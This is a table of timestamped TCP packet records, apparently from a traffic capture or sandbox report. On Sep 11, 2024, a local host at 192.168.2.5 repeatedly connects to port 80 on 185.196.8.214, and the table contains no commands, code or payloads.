                                                            Sep 11, 2024 21:06:22.198016882 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.311017990 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.311158895 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.316282988 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:22.316412926 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.316538095 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.316628933 CEST8049722185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:22.316696882 CEST4972280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:22.321696043 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:22.998537064 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:22.998759985 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.109916925 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.115343094 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.356381893 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.356735945 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.469322920 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.476036072 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.709589958 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.709678888 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.846827030 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.847405910 CEST4972480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.852168083 CEST8049723185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.852277994 CEST4972380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.852375984 CEST8049724185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:23.852746964 CEST4972480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.859535933 CEST4972480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:23.864532948 CEST8049724185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:24.545241117 CEST8049724185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:24.545348883 CEST4972480192.168.2.5185.196.8.214
Sep 11, 2024 21:06:24.655040979 CEST  49724  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:24.660018921 CEST  80     49724  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:24.913373947 CEST  80     49724  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:24.913525105 CEST  49724  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:25.032943964 CEST  49724  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:25.033282042 CEST  49725  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:25.038394928 CEST  80     49725  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:25.038443089 CEST  80     49724  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:25.038481951 CEST  49725  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:25.038508892 CEST  49724  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:25.038696051 CEST  49725  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:25.043939114 CEST  80     49725  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:25.760459900 CEST  80     49725  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:25.760562897 CEST  49725  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:25.875525951 CEST  49725  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:25.881180048 CEST  80     49725  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:26.218106985 CEST  80     49725  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:26.218180895 CEST  49725  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:26.328850031 CEST  49725  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:26.334028959 CEST  80     49725  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:26.568453074 CEST  80     49725  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:26.568628073 CEST  49725  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:26.688152075 CEST  49725  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:26.688572884 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:26.697981119 CEST  80     49725  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:26.698025942 CEST  80     49726  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:26.698261023 CEST  49725  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:26.698261976 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:26.698498011 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:26.704950094 CEST  80     49726  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:27.422672987 CEST  80     49726  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:27.422938108 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:27.533900023 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:27.539446115 CEST  80     49726  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:27.778727055 CEST  80     49726  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:27.778831959 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:27.889357090 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:27.894432068 CEST  80     49726  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:28.137547016 CEST  80     49726  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:28.137634039 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:28.250528097 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:28.255537987 CEST  80     49726  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:28.493657112 CEST  80     49726  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:28.493940115 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:28.608582020 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:28.609061956 CEST  49727  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:28.615183115 CEST  80     49726  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:28.615259886 CEST  49726  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:28.615366936 CEST  80     49727  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:28.615447044 CEST  49727  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:28.615607023 CEST  49727  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:28.621747971 CEST  80     49727  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:29.319762945 CEST  80     49727  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:29.319895983 CEST  49727  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:29.436232090 CEST  49727  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:29.436534882 CEST  49728  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:29.441450119 CEST  80     49728  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:29.441513062 CEST  80     49727  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:29.441564083 CEST  49728  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:29.441644907 CEST  49728  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:29.441668034 CEST  49727  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:29.446465015 CEST  80     49728  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:30.164091110 CEST  80     49728  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:30.164158106 CEST  49728  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:30.281743050 CEST  49728  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:30.282151937 CEST  49729  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:30.287026882 CEST  80     49728  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:30.287074089 CEST  80     49729  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:30.287101030 CEST  49728  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:30.287153006 CEST  49729  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:30.287338972 CEST  49729  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:30.292889118 CEST  80     49729  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:31.117788076 CEST  80     49729  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:31.118016958 CEST  49729  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:31.235138893 CEST  49729  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:31.235428095 CEST  49730  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:31.240381002 CEST  80     49730  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:31.240489960 CEST  49730  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:31.240520000 CEST  80     49729  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:31.240585089 CEST  49729  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:31.240688086 CEST  49730  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:31.245515108 CEST  80     49730  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:31.960966110 CEST  80     49730  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:31.961080074 CEST  49730  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:32.077366114 CEST  49730  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:32.077711105 CEST  49731  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:32.082712889 CEST  80     49730  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:32.082756042 CEST  80     49731  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:32.082771063 CEST  49730  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:32.082834005 CEST  49731  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:32.082981110 CEST  49731  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:32.087938070 CEST  80     49731  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:33.084676027 CEST  80     49731  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:33.084847927 CEST  49731  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:33.201875925 CEST  49731  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:33.202157974 CEST  49732  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:33.207494020 CEST  80     49732  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:33.207624912 CEST  80     49731  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:33.207740068 CEST  49732  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:33.207740068 CEST  49732  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:33.207827091 CEST  49731  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:33.213126898 CEST  80     49732  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:33.902400017 CEST  80     49732  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:33.902632952 CEST  49732  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:34.016259909 CEST  49732  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:34.021431923 CEST  80     49732  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:34.288535118 CEST  80     49732  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:34.288980007 CEST  49732  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:34.405518055 CEST  49732  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:34.405853033 CEST  49733  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:34.410912991 CEST  80     49732  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:34.410932064 CEST  80     49733  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:34.410978079 CEST  49732  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:34.411029100 CEST  49733  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:34.411134005 CEST  49733  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:34.416026115 CEST  80     49733  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:35.098615885 CEST  80     49733  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:35.098906040 CEST  49733  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:35.217842102 CEST  49733  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:35.218234062 CEST  49734  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:35.223196983 CEST  80     49734  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:35.223355055 CEST  80     49733  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:35.223404884 CEST  49734  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:35.223437071 CEST  49733  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:35.223618984 CEST  49734  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:35.228619099 CEST  80     49734  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:35.918203115 CEST  80     49734  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:35.918370962 CEST  49734  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:36.030136108 CEST  49734  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:36.034966946 CEST  80     49734  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:36.274380922 CEST  80     49734  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:36.274434090 CEST  49734  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:36.389424086 CEST  49734  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:36.389766932 CEST  49735  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:36.394597054 CEST  80     49734  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:36.394615889 CEST  80     49735  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:36.394664049 CEST  49734  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:36.394727945 CEST  49735  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:36.394933939 CEST  49735  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:36.399758101 CEST  80     49735  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:37.246777058 CEST  80     49735  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:37.246857882 CEST  49735  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:37.358622074 CEST  49735  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:37.363662958 CEST  80     49735  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:37.594295979 CEST  80     49735  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:37.594424009 CEST  49735  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:37.702301025 CEST  49735  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:37.709265947 CEST  80     49735  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:37.939866066 CEST  80     49735  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:37.940099955 CEST  49735  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.062432051 CEST  49735  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.062854052 CEST  49736  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.068231106 CEST  80     49736  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:38.068332911 CEST  49736  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.068643093 CEST  49736  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.068687916 CEST  80     49735  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:38.068758965 CEST  49735  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.073887110 CEST  80     49736  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:38.788089991 CEST  80     49736  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:38.788211107 CEST  49736  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.906649113 CEST  49736  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.907000065 CEST  49737  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.912220955 CEST  80     49737  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:38.912307978 CEST  49737  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.912429094 CEST  49737  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.912611008 CEST  80     49736  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:38.912668943 CEST  49736  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:38.917350054 CEST  80     49737  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:39.632658958 CEST  80     49737  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:39.632772923 CEST  49737  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:39.752324104 CEST  49737  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:39.752690077 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:39.757550001 CEST  80     49737  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:39.757647991 CEST  49737  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:39.757675886 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:39.757774115 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:39.757965088 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:39.762772083 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:40.485228062 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:40.485385895 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:40.594259024 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:40.599510908 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:40.839402914 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:40.839570999 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:40.952760935 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:40.957842112 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:41.199531078 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:41.199615955 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:41.313968897 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:41.564178944 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:41.796288013 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:41.796372890 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:41.907008886 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:41.913625002 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:42.152395964 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:42.152595997 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:42.268094063 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:42.448137045 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:42.687093019 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:42.687248945 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:42.796204090 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:42.802287102 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:43.040795088 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:43.040860891 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.155622959 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.156105995 CEST  49739  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.161279917 CEST  80     49738  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:43.161323071 CEST  80     49739  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:43.161362886 CEST  49738  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.161444902 CEST  49739  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.161571980 CEST  49739  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.166443110 CEST  80     49739  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:43.864748001 CEST  80     49739  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:43.864891052 CEST  49739  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.984441996 CEST  49739  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.984725952 CEST  49740  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.989810944 CEST  80     49739  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:43.989911079 CEST  49739  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.990122080 CEST  80     49740  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:43.990200996 CEST  49740  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.990395069 CEST  49740  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:43.995438099 CEST  80     49740  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:44.711309910 CEST  80     49740  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:44.711437941 CEST  49740  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:44.828315973 CEST  49740  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:44.828757048 CEST  49741  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:44.834088087 CEST  80     49741  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:44.834157944 CEST  49741  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:44.834280968 CEST  49741  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:44.837750912 CEST  80     49740  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:44.837805986 CEST  49740  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:44.839131117 CEST  80     49741  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:45.545675993 CEST  80     49741  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:45.545838118 CEST  49741  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:45.657083035 CEST  49741  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:45.661912918 CEST  80     49741  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:45.897728920 CEST  80     49741  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:45.897834063 CEST  49741  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.019316912 CEST  49741  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.020529032 CEST  49742  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.024825096 CEST  80     49741  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:46.025054932 CEST  49741  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.025676012 CEST  80     49742  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:46.025763988 CEST  49742  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.034827948 CEST  49742  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.039854050 CEST  80     49742  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:46.723483086 CEST  80     49742  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:46.723627090 CEST  49742  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.844187021 CEST  49742  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.844523907 CEST  49743  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.849389076 CEST  80     49743  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:46.849489927 CEST  49743  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.849680901 CEST  49743  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.849697113 CEST  80     49742  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:46.849773884 CEST  49742  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:46.854476929 CEST  80     49743  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:47.537904024 CEST  80     49743  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:47.539505959 CEST  49743  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:47.657783985 CEST  49743  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:47.658262968 CEST  49744  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:47.663450003 CEST  80     49743  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:47.663464069 CEST  80     49744  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:47.663520098 CEST  49743  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:47.663577080 CEST  49744  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:47.663727045 CEST  49744  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:47.668557882 CEST  80     49744  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:48.660645008 CEST  80     49744  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:48.660924911 CEST  49744  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:48.780031919 CEST  49744  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:48.780348063 CEST  49745  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:48.785319090 CEST  80     49744  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:48.785331011 CEST  80     49745  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:48.785433054 CEST  49744  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:48.785479069 CEST  49745  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:48.786490917 CEST  49745  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:48.791455030 CEST  80     49745  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:49.481365919 CEST  80     49745  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:49.481617928 CEST  49745  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:49.602663040 CEST  49745  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:49.603102922 CEST  49746  80     192.168.2.5    185.196.8.214
Sep 11, 2024 21:06:49.607990980 CEST  80     49746  185.196.8.214  192.168.2.5
Sep 11, 2024 21:06:49.608073950 CEST  80     49745  185.196.8.214  192.168.2.5
                                                            Sep 11, 2024 21:06:49.608408928 CEST4974580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:49.608408928 CEST4974680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:49.608409882 CEST4974680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:49.613245010 CEST8049746185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:50.341321945 CEST8049746185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:50.341492891 CEST4974680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:50.453423977 CEST4974680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:50.458376884 CEST8049746185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:50.706715107 CEST8049746185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:50.706825972 CEST4974680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:50.826780081 CEST4974680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:50.827199936 CEST4974780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:50.832149982 CEST8049747185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:50.832230091 CEST4974780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:50.832351923 CEST4974780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:50.837445021 CEST8049747185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:50.839484930 CEST8049746185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:50.839606047 CEST4974680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:51.549276114 CEST8049747185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:51.549356937 CEST4974780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:51.672558069 CEST4974780192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:51.672955990 CEST4974880192.168.2.5185.196.8.214
